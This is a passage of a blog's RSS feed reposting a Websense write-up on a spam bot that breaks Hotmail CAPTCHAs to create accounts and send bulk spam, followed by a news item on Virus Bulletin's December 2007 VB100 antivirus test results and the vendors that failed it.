&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.2.PNG"&gt; 
&lt;p&gt;
&lt;i&gt;Part 3: Proper login in progress over SSL page.&lt;/i&gt; 
&lt;p&gt;
&lt;em&gt;&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.3.PNG"&gt;&lt;/em&gt; 
&lt;p&gt;
&lt;em&gt;&lt;i&gt;Part 4: Observe the bot attempted a successful login on to a proper Live Hotmail
Server page.&lt;/i&gt;&lt;/em&gt; 
&lt;p&gt;
&lt;em&gt;&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.4.PNG"&gt;&lt;/em&gt; 
&lt;p&gt;
&lt;em&gt;&lt;i&gt;Part 5: Observe the bot attempting to initiate the edit process or composing
a message for spamming.&lt;/i&gt;&lt;/em&gt; 
&lt;p&gt;
&lt;em&gt;&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.5.PNG"&gt;&lt;/em&gt; 
&lt;p&gt;
&lt;i&gt;Part 6: Spam message build in progress by the bot.&lt;/i&gt; 
&lt;p&gt;
&lt;em&gt;&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.6.PNG"&gt;&lt;/em&gt; 
&lt;p&gt;
&lt;i&gt;Part 7: Bot successfully filling in the "from email address list", “to email address”
lists, email subject, and the body to be included in the message for spamming purposes,
thereby completing its task.&lt;/i&gt; 
&lt;p&gt;
&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.7.PNG"&gt; 
&lt;p&gt;
End of message! Spam is being sent to targeted accounts.&lt;br&gt;
&lt;i&gt;Part 8: Finally the account is logged out to continue its similar operation with
the next email account.&lt;/i&gt; 
&lt;p&gt;
&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.8.PNG"&gt; 
&lt;p&gt;
&lt;i&gt;Part 9: The entire process in action that is carried out in an iterative manner to
perform mass-mailing from different accounts created by the bot.&lt;/i&gt; 
&lt;p&gt;
&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.9.PNG"&gt; 
&lt;p&gt;
Spammers finally have success advertising their product. 
&lt;p&gt;
&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.10.PNG"&gt; 
&lt;p&gt;
&lt;b&gt;Observations:&lt;/b&gt;
&lt;br&gt;
&lt;b&gt;Stage 1: &lt;/b&gt;One in every 8 to 10 attempts to sign up a Hotmail account is successful.
Hence the success rate ranges approximately between 10 and 15%.&lt;br&gt;
&lt;b&gt;Stage 2: &lt;/b&gt;Spam campaigns from one Hotmail account are sent to multiple accounts
in CC and BCC lists at a time. The same Hotmail account (or “from account/address”)
is not repeatedly used for sending spam campaigns continuously. They are changed in a
timely fashion by the bot. The same is the case with targeted accounts (or “to account(s)/addresses”)
for spamming.&lt;br&gt;
&lt;b&gt;Additional Information:&lt;/b&gt;
&lt;br&gt;
It is observed that unlike &lt;a href="http://securitylabs.websense.com/content/Blogs/2907.aspx"&gt;&lt;u&gt;Live
Mail Anti-CAPTCHA&lt;/u&gt;&lt;/a&gt; and &lt;a href="http://securitylabs.websense.com/content/Blogs/2919.aspx"&gt;&lt;u&gt;Gmail
Anti-CAPTCHA&lt;/u&gt;&lt;/a&gt; operations in the past, the current attack is aggressive and
instantaneous in terms of CAPTCHA breaking host turn-around time.&lt;br&gt;
In the current attack, the response time of CAPTCHA breaking host after grabbing a
CAPTCHA image from a victims’ machine, analyzing it, and responding back to victims’
machine with corresponding CAPTCHA code is &lt;i&gt;relatively lower &lt;/i&gt;when compared to
previous attacks.&lt;br&gt;
&lt;i&gt;&lt;b&gt;Note 1:&lt;/b&gt; It is observed that the total response time for CAPTCHA breaking
on the average is only about 6 seconds*.&lt;/i&gt; 
&lt;p&gt;
&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-3.PNG"&gt; 
&lt;p&gt;
&lt;i&gt;&lt;b&gt;Note 2:&lt;/b&gt; The timing on the request/response in this current attack clearly
indicates the possibility of an automated system at the spammers’ end performing the
Anti-CAPTCHA operation.&lt;/i&gt;
&lt;br&gt;
Websense believes that these accounts could be used by the spammers at any time for
a variety of social-engineering attacks in future. A wide range of attacks (both manual
and automated) would be possible using the same account credentials on other significant
Live services integrated with Live Hotmail services offered by Microsoft Corporation,
such as Live Messenger (instant messaging), Live Spaces (online storage), etc.
&lt;/p&gt;
&lt;p&gt;
Note: For more information on Hotmail aka Live Hotmail and Live services, see the
Hotmail, Live Hotmail and Live Mail entries on &lt;a href="http://www.wikipedia.org/"&gt;&lt;u&gt;Wikipedia&lt;/u&gt;&lt;/a&gt;.&lt;br&gt;
[/QUOTE]
&lt;/p&gt;
&lt;p&gt;
&lt;strong&gt;Source: &lt;/strong&gt;&lt;a title="http://securitylabs.websense.com/content/Blogs/3063.aspx" href="http://securitylabs.websense.com/"&gt;http://securitylabs.websense.com/&lt;/a&gt;
&lt;/p&gt;
</description>
      <category>EN</category>
      <category>internet</category>
      <category>security</category>
    </item>
    <item>
      <trackback:ping>http://www.loosy-goosy-ness.com/Trackback.aspx?guid=bb8a3572-d911-443d-b38e-89708316c6e6</trackback:ping>
      <pingback:server>http://www.loosy-goosy-ness.com/pingback.aspx</pingback:server>
      <pingback:target>http://www.loosy-goosy-ness.com/PermaLink,guid,bb8a3572-d911-443d-b38e-89708316c6e6.aspx</pingback:target>
      <dc:creator>Christian</dc:creator>
      <body xmlns="http://www.w3.org/1999/xhtml">
        <p>
[QUOTE] 
<br />
Researchers at <a href="http://www.virusbtn.com/">Virus Bulletin</a> have released
the results of the latest VB100 computer security test, highlighting failures at a
number of leading security vendors.
</p>
        <p>
Products from <a href="http://www.sophos.com/">Sophos</a>, <a href="http://www.trendmicro.com/">Trend
Micro</a> and <a href="http://www.kaspersky.com/">Kaspersky</a> were among those that
failed to protect fully against a collection of outdated viruses.
</p>
        <p>
The December edition of the VB100 test subjected security software to 100 Windows
2000 viruses collected from labs and websites.
</p>
        <p>
"It was a shock and a concern to see such a poor performance from so many products
in this latest round of testing," said John Hawes, a technical consultant at
Virus Bulletin.
</p>
        <p>
"It is particularly disappointing to see so many major products missing significant
real-world threats."
</p>
        <p>
In order to pass the test, vendors needed to identify 100 malware samples as well
as avoid reporting false positives on clean samples.
</p>
        <p>
Kaspersky failed the test by missing one virus from the list, while Sophos missed
eight. Trend Micro missed four virus samples, failing VB100 certification for the
fourth time in five tests.
</p>
        <p>
Trend Micro products had passed 13 consecutive VB100 tests. The company declined to
comment on the results.
</p>
        <p>
Other notable security products failing the VB100 test included <a href="http://www.pctools.com/">PC
Tools</a>' Spyware Doctor, which recorded two false positives, and <a href="http://www.norman.com/">Norman
Virus Control</a>, which missed 14 samples and recorded six false positives. 
</p>
        <p>
Companies whose products passed the test included <a href="http://www.bitdefender.com/">BitDefender</a>, <a href="http://www.symantec.com/">Symantec</a>, <a href="http://www.mcafee.com/">McAfee</a>, <a href="http://www.sunbelt-software.com/">Sunbelt</a> and <a href="http://www.microsoft.com/">Microsoft</a>. 
<br />
[/QUOTE]
</p>
        <p>
Source: <a title="http://www.vnunet.com/vnunet/news/2205034/virus-bulletin-reveals-latest" href="http://www.vnunet.com">http://www.vnunet.com</a></p>
      </body>
      <title>Security giants fail VB100 virus test</title>
      <guid isPermaLink="false">http://www.loosy-goosy-ness.com/PermaLink,guid,bb8a3572-d911-443d-b38e-89708316c6e6.aspx</guid>
      <link>http://www.loosy-goosy-ness.com/2007/12/12/SecurityGiantsFailVB100VirusTest.aspx</link>
      <pubDate>Wed, 12 Dec 2007 13:51:45 GMT</pubDate>
      <description>&lt;p&gt;
[QUOTE] 
&lt;br /&gt;
Researchers at &lt;a href="http://www.virusbtn.com/"&gt;Virus Bulletin&lt;/a&gt; have released
the results of the latest VB100 computer security test, highlighting failures at a
number of leading security vendors.
&lt;/p&gt;
&lt;p&gt;
Products from &lt;a href="http://www.sophos.com/"&gt;Sophos&lt;/a&gt;, &lt;a href="http://www.trendmicro.com/"&gt;Trend
Micro&lt;/a&gt; and &lt;a href="http://www.kaspersky.com/"&gt;Kaspersky&lt;/a&gt; were among those that
failed to protect fully against a collection of outdated viruses.
&lt;/p&gt;
&lt;p&gt;
The December edition of the VB100 test subjected security software to 100 Windows
2000 viruses collected from labs and websites.
&lt;/p&gt;
&lt;p&gt;
&amp;quot;It was a shock and a concern to see such a poor performance from so many products
in this latest round of testing,&amp;quot; said John Hawes, a technical consultant at
Virus Bulletin.
&lt;/p&gt;
&lt;p&gt;
&amp;quot;It is particularly disappointing to see so many major products missing significant
real-world threats.&amp;quot;
&lt;/p&gt;
&lt;p&gt;
In order to pass the test, vendors needed to identify 100 malware samples as well
as avoid reporting false positives on clean samples.
&lt;/p&gt;
&lt;p&gt;
Kaspersky failed the test by missing one virus from the list, while Sophos missed
eight. Trend Micro missed four virus samples, failing VB100 certification for the
fourth time in five tests.
&lt;/p&gt;
&lt;p&gt;
Trend Micro products had passed 13 consecutive VB100 tests. The company declined to
comment on the results.
&lt;/p&gt;
&lt;p&gt;
Other notable security products failing the VB100 test included &lt;a href="http://www.pctools.com/"&gt;PC
Tools&lt;/a&gt;' Spyware Doctor, which recorded two false positives, and &lt;a href="http://www.norman.com/"&gt;Norman
Virus Control&lt;/a&gt;, which missed 14 samples and recorded six false positives. 
&lt;/p&gt;
&lt;p&gt;
Companies whose products passed the test included &lt;a href="http://www.bitdefender.com/"&gt;BitDefender&lt;/a&gt;, &lt;a href="http://www.symantec.com/"&gt;Symantec&lt;/a&gt;, &lt;a href="http://www.mcafee.com/"&gt;McAfee&lt;/a&gt;, &lt;a href="http://www.sunbelt-software.com/"&gt;Sunbelt&lt;/a&gt; and &lt;a href="http://www.microsoft.com/"&gt;Microsoft&lt;/a&gt;. 
&lt;br /&gt;
[/QUOTE]
&lt;/p&gt;
&lt;p&gt;
Source: &lt;a title="http://www.vnunet.com/vnunet/news/2205034/virus-bulletin-reveals-latest" href="http://www.vnunet.com"&gt;http://www.vnunet.com&lt;/a&gt;
&lt;/p&gt;
</description>
      <category>EN</category>
      <category>security</category>
    </item>
  </channel>
</rss>